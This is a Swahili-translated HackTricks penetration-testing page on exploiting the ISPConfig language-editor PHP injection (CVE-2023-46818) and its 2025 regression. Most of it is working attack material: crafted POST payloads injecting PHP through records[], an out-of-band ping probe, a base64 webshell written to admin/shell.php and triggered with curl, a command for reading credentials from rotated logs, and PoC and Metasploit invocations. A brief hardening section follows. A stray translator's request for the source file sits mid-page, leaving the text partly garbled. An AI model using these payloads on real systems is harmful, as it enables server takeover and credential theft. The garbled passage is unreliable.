ISPConfig

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

ISPConfig ni paneli ya udhibiti ya hosting ya chanzo wazi. Matoleo ya zamani 3.2.x yaliambatanisha kipengele cha mhariri wa faili za lugha ambacho, kinapowezeshwa kwa msimamizi mkuu, kiliruhusu arbitrary PHP code injection kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kusababisha RCE katika muktadha wa web server na, kulingana na jinsi PHP inavyotekelezwa, privilege escalation.

Njia muhimu za default:

  • Web root mara nyingi iko katika /var/www/ispconfig inapohudumiwa na php -S au kupitia Apache/nginx.
  • Admin UI inaweza kupatikana kwenye vhost wa HTTP(S) (mara nyingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).

Kidokezo: Ikiwa paneli imefungwa kwa localhost (mf. 127.0.0.1:8080), fowada:

ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Mhariri wa lugha PHP code injection (CVE-2023-46818)

  • Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
  • Masharti ya awali:
  • Ingia kama akaunti ya superadmin iliyojengwa admin (majukumu mengine hayajaathiriwa kulingana na msambazaji)
  • Mhariri wa lugha lazima uwe umewezeshwa: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
  • Madhara: Admin aliyethibitishwa anaweza kuingiza PHP yoyote ambayo inaandikwa kwenye faili la lugha na kutekelezwa na programu, kupata RCE katika muktadha wa wavuti

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Manual exploitation flow

  1. Open/create a language file to obtain CSRF tokens

Tuma POST ya kwanza ili kuanzisha fomu na changanua viwanja vya CSRF kutoka kwenye jibu la HTML (csrf_id, csrf_key). Mfano wa path ya ombi: /admin/language_edit.php.

  1. Inject PHP via records[] and save

Tuma POST ya pili ikijumuisha viwanja vya CSRF na rekodi ya tafsiri yenye madhara. Minimal command-execution probes:

POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Mtihani wa Out-of-band (angalia ICMP):

records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
  1. Andika mafaili na weka webshell

Tumia file_put_contents kuunda faili chini ya njia inayofikika kwenye wavuti (kwa mfano, admin/):

records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika mwili wa POST:

records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

Nahitaji maudhui ya faili src/network-services-pentesting/pentesting-web/ispconfig.md ili niweze kutafsiri. Tafadhali liambatishe hapa (nitatafsiri maandishi ya Kiingereza yanayofaa kwa Kiswahili huku nikiacha code, links, paths, na tags/markdown bila kubadilisha).

curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

If PHP is executed as root (e.g., via php -S 127.0.0.1:8080 started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.

Regression ya 2025 (ISPConfig 3.3.0 / 3.3.0p1)

Hitilafu ya language editor ilirejea katika 3.3.0/3.3.0p1 na ilirekebishwa katika 3.3.0p2. Masharti ya awali hayajabadilika (admin_allow_langedit na admin login). Patch ile ile pia ilishughulikia monitor XSS na world-readable rotated logs.

Vidokezo:

  • Katika 3.3.0/3.3.0p1, world-readable rotated logs chini ya /usr/local/ispconfig/interface/log/ yanaweza leak credentials ikiwa debug logging ilikuwa imewezeshwa:
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
  • Hatua za exploit zinaendana na CVE-2023-46818; 3.3.0p2 inaongeza ukaguzi wa ziada kabla ya kuhariri lugha.

Python PoC

Exploit tayari kwa matumizi hufanya token handling na payload delivery kwa otomatiki:

Mfano la utekelezaji:

python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Metasploit module (iliyotolewa Julai 2025)

Rapid7 imeongeza exploit/linux/http/ispconfig_lang_edit_php_code_injection, ambayo inaweza kuwezesha moja kwa moja admin_allow_langedit ikiwa akaunti ya admin iliyotolewa ina haki za system-config.

use exploit/linux/http/ispconfig_lang_edit_php_code_injection
set RHOSTS 10.10.10.50
set RPORT 8080
set USERNAME admin
set PASSWORD <admin_pass>
set TARGETURI /
run

Moduli inaandika payload iliyosimbwa kwa base64 kupitia records[] na kuitekeleza, ikitoa PHP Meterpreter au payload ya kawaida.

Kuimarisha

  • Sasisha hadi 3.2.11p1 au baadaye kwa tatizo la awali, na hadi 3.3.0p2 au baadaye kwa regression ya 2025.
  • Zima mhariri wa lugha isipokuwa unapohitajika kabisa:
admin_allow_langedit=no
  • Epuka kuendesha paneli kama root; sanidi PHP-FPM au web server ili kupunguza privileges
  • Lazimisha uthibitishaji thabiti kwa akaunti ya admin iliyojengewa

Marejeleo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks